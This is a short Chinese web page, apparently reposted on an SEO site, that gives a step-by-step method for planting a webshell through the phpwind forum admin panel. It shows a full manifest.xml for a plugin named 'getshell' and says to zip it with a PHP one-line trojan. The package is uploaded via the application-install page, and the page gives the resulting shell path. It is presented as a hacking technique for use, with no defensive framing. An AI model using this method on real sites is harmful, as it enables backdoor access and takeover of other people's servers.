当前位置:主页 > 高级SEO技术 > [黑客技术]phpwind后台不同的抓shell方法

[黑客技术]phpwind后台不同的抓shell方法

在phpwind后台上传插件处,可以上传一个包含php木马的phpwind标准格式插件安装包,并可getshell.

一、先制作一个安装包,需要包含一个manifest.xml文件和一个php一句话(此处文件名为php.php)。

manifest.xml代码如下:

<?xml version="1.0" encoding="gbk"?>
<manifest>
<application>
<name>getshell</name>
<alias>getshell</alias>
<version>1.0</version>
<pw-version>1.0</pw-version>
<type>app</type>
<description>getshell
</description>
<charset>gbk</charset>
<website>http://wooyun.org</website>
<author-name>123@wooyun</author-name>
<author-email>root@wooyun.org</author-email>
<author-icon>http://wooyun.org</author-icon>
</application>
<res>res</res>
</manifest> 

将以上文件打包成zip格式。

 

二、在后台 点击云平台→应用管理→本地安装处上传制作好的安装包,并点击安装。


9477714 

三、shell为http://127.0.0.1/phpwind/src/extensions/getshell/php.php

文章来源于互联网,如有侵权请联系站长删除。
转载:[黑客技术]phpwind后台不同的抓shell方法请注明出处 http://www.78320.cn

[黑客技术]phpwind后台不同的抓shell方法:等您坐沙发呢!

发表评论



评论列表(条)

    
    返回首页 评论 向上